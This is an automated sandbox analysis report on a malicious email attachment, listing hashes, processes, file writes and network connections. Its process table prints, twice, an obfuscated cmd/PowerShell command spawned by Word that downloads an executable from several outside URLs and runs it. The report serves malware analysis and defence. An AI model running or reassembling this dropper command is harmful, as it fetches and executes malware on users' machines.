File name: | 0-1gjjfu-0006Sh-6C.eml |
Full analysis: | https://app.any.run/tasks/12707d3e-3f2d-4689-bfce-ae9a13eeab9f |
Verdict: | Malicious activity |
Analysis date: | January 18, 2019, 09:58:42 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | message/rfc822 |
File info: | RFC 822 mail, ASCII text |
MD5: | 4656507BDE8D5307F21061184EF77F62 |
SHA1: | C62C120C5067A588A4383BBFED6979CE874AE016 |
SHA256: | 5DDB94B59894CE80A7FFB1B90F98E535B5A769E5B5B832C3213260F9DFD943E0 |
SSDEEP: | 1536:kEtoB6sPASLGuqt53iul5CUR0CAmRSrM4achevoL4SuLpYEDuRkAu21N:noA2GpEBrJoHDqV |
.eml | | | E-Mail message (Var. 5) (100) |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3004 | "C:\PROGRA~1\MICROS~1\Office14\OUTLOOK.EXE" /eml "C:\Users\admin\AppData\Local\Temp\0-1gjjfu-0006Sh-6C.eml" | C:\PROGRA~1\MICROS~1\Office14\OUTLOOK.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Version: 14.0.6025.1000 | ||||
3732 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\ZRGLBV5Q\Untitled_012019_GKR8765090-263.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | OUTLOOK.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3900 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3784 | "C:\Windows\system32\cmd.exe" /c %pROgRaMdATA:~0,1%%PrOgrAMDATa:~9,2% /V:On /r" Set 6bsD=p.w^%PUBLI`c~5,1^%\^%SESSIONNAMEc~-4,1^%h^%_EMPc~-3,1^%ll $NZGti.nZGl9l='?.9ileli';$_unisiZGwi=new-.9je[t Net:We9`lient;$.liveuws='httpc//www:.desZGg\.up:[.?/[6f#hPN7@httpc//ev.queZG\t:[.?/Wk0MdRvGuwW@httpc//lept.ku\t.sis:[.?/w?K5ZKF?inG@httpc//?i?iZG9ne\:[.?/tvp\RKd_@httpc//kids-edu[ZGti.n-supp.\t:[.?/ZKFuwlOlfNSSF':Split('@');$s[he?ZGsiw='UsZG9ilityuws';$Isleiw = '420';$v.\tZGlsluw='vi\tuZGlsf';$Av.n9j=$envcpu9li[+']'+$Isleiw+':exe';f.\eZG[h($Est.niZGll in $.liveuws){t\y{$_unisiZGwi:4w.wnl.ZGdFile($Est.niZGll, $Av.n9j);$input\d='PennsylvZGniZGfq';If ((Get-Ite? $Av.n9j):length -ge 80000) {Inv.ke-Ite? $Av.n9j;$B.\de\swp='?.9ileZGk';9\eZGk;}}[ZGt[h{}}$?eth.d.l.gyZGp='we9\eZGdinessfu';& sEt vkp=!6bsD:.=o!&& sEt Db=!vkp:uw=z!& SEt wzu=!Db:ZG=a!& seT 8d=!wzu:6=J!& SeT lJ=!8d::=.!&& SET f4=!lJ:c=:!&& seT 9R=!f4:[=c!&seT HFMG=!9R:#=6!&& seT mAj9=!HFMG:_=T!&&SET ZxJC=!mAj9:?=m!&& SeT Hwk=!ZxJC:ZKF=X!& SeT w6=!Hwk:4w=D!&SET Lv=!w6:9=b!&& SET jI5Q=!Lv:\=r!&sEt DR=!jI5Q:`=C!& SET QcHS=!DR:]=\!&& eChO %QcHS% | %comMONpROgrAMFIlEs(x86):~-12,1%MD " | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 255 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2412 | CmD /V:On /r" Set 6bsD=p.w^%PUBLI`c~5,1^%\^%SESSIONNAMEc~-4,1^%h^%_EMPc~-3,1^%ll $NZGti.nZGl9l='?.9ileli';$_unisiZGwi=new-.9je[t Net:We9`lient;$.liveuws='httpc//www:.desZGg\.up:[.?/[6f#hPN7@httpc//ev.queZG\t:[.?/Wk0MdRvGuwW@httpc//lept.ku\t.sis:[.?/w?K5ZKF?inG@httpc//?i?iZG9ne\:[.?/tvp\RKd_@httpc//kids-edu[ZGti.n-supp.\t:[.?/ZKFuwlOlfNSSF':Split('@');$s[he?ZGsiw='UsZG9ilityuws';$Isleiw = '420';$v.\tZGlsluw='vi\tuZGlsf';$Av.n9j=$envcpu9li[+']'+$Isleiw+':exe';f.\eZG[h($Est.niZGll in $.liveuws){t\y{$_unisiZGwi:4w.wnl.ZGdFile($Est.niZGll, $Av.n9j);$input\d='PennsylvZGniZGfq';If ((Get-Ite? $Av.n9j):length -ge 80000) {Inv.ke-Ite? $Av.n9j;$B.\de\swp='?.9ileZGk';9\eZGk;}}[ZGt[h{}}$?eth.d.l.gyZGp='we9\eZGdinessfu';& sEt vkp=!6bsD:.=o!&& sEt Db=!vkp:uw=z!& SEt wzu=!Db:ZG=a!& seT 8d=!wzu:6=J!& SeT lJ=!8d::=.!&& SET f4=!lJ:c=:!&& seT 9R=!f4:[=c!&seT HFMG=!9R:#=6!&& seT mAj9=!HFMG:_=T!&&SET ZxJC=!mAj9:?=m!&& SeT Hwk=!ZxJC:ZKF=X!& SeT w6=!Hwk:4w=D!&SET Lv=!w6:9=b!&& SET jI5Q=!Lv:\=r!&sEt DR=!jI5Q:`=C!& SET QcHS=!DR:]=\!&& eChO %QcHS% | %comMONpROgrAMFIlEs(x86):~-12,1%MD " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 255 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2800 | C:\Windows\system32\cmd.exe /S /D /c" eChO %QcHS% " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1904 | "C:\Program Files\Google\Chrome\Application\chrome.exe" | C:\Program Files\Google\Chrome\Application\chrome.exe | explorer.exe | |
User: admin Company: Google Inc. Integrity Level: MEDIUM Description: Google Chrome Exit code: 3221225547 Version: 68.0.3440.106 | ||||
3212 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=68.0.3440.106 --initial-client-data=0x78,0x7c,0x80,0x74,0x84,0x6ba200b0,0x6ba200c0,0x6ba200cc | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe |
User: admin Company: Google Inc. Integrity Level: MEDIUM Description: Google Chrome Exit code: 0 Version: 68.0.3440.106 | ||||
2272 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2632 --on-initialized-event-handle=304 --parent-handle=308 /prefetch:6 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe |
User: admin Company: Google Inc. Integrity Level: MEDIUM Description: Google Chrome Exit code: 0 Version: 68.0.3440.106 | ||||
3496 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=932,4704809508607564985,796817884086899981,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=14150BBF9F2A1A501A4CA7F355045697 --mojo-platform-channel-handle=1000 --ignored=" --type=renderer " /prefetch:2 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe |
User: admin Company: Google Inc. Integrity Level: LOW Description: Google Chrome Exit code: 0 Version: 68.0.3440.106 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3004 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVR6B1E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3004 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\~DF8AC8609EC5F46397.TMP | — | |
MD5:— | SHA256:— | |||
3004 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\ZRGLBV5Q\Untitled_012019_GKR8765090-263 (2).doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
3732 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9144.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3732 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_F1A26A68-6F94-4F67-B82F-3D637A2F7AAF.0\4BF98050.doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
3732 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\136BDADE.wmf | — | |
MD5:— | SHA256:— | |||
3004 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc | |
MD5:D13557F39096FB1A66F2C2FC3FAD205A | SHA256:B2EFF022C85F37C1C1E6371F97C0BF477C1F8C456C6908CD14DA312D61AF49D9 | |||
3732 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6784AA9C.wmf | — | |
MD5:— | SHA256:— | |||
3900 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_F1A26A68-6F94-4F67-B82F-3D637A2F7AAF.0\~DFE49C9AC061B14008.TMP | — | |
MD5:— | SHA256:— | |||
3900 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_F1A26A68-6F94-4F67-B82F-3D637A2F7AAF.0\mso9D98.tmp | compressed | |
MD5:DA3A99D2D5AFB4DE8BD4DDB43824C98D | SHA256:B1893E388E0DE326A4622CC166C6EEC5F28F5B924FD8C0E707C5E2DA29466B80 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3004 | OUTLOOK.EXE | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1904 | chrome.exe | 172.217.21.202:443 | safebrowsing.googleapis.com | Google Inc. | US | whitelisted |
1904 | chrome.exe | 172.217.18.173:443 | accounts.google.com | Google Inc. | US | whitelisted |
1904 | chrome.exe | 172.217.16.163:443 | www.google.de | Google Inc. | US | whitelisted |
1904 | chrome.exe | 216.58.207.67:443 | ssl.gstatic.com | Google Inc. | US | whitelisted |
3004 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
1904 | chrome.exe | 172.217.16.131:443 | www.gstatic.com | Google Inc. | US | whitelisted |
1904 | chrome.exe | 216.58.210.3:443 | clientservices.googleapis.com | Google Inc. | US | whitelisted |
1904 | chrome.exe | 216.58.205.234:443 | fonts.googleapis.com | Google Inc. | US | whitelisted |
1904 | chrome.exe | 216.58.207.78:443 | apis.google.com | Google Inc. | US | whitelisted |
1904 | chrome.exe | 172.217.18.163:443 | www.google.nl | Google Inc. | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
config.messenger.msn.com |
| whitelisted |
clientservices.googleapis.com |
| whitelisted |
www.gstatic.com |
| whitelisted |
www.google.de |
| whitelisted |
safebrowsing.googleapis.com |
| whitelisted |
accounts.google.com |
| shared |
ssl.gstatic.com |
| whitelisted |
apis.google.com |
| whitelisted |
www.google.com |
| whitelisted |
www.google.nl |
| whitelisted |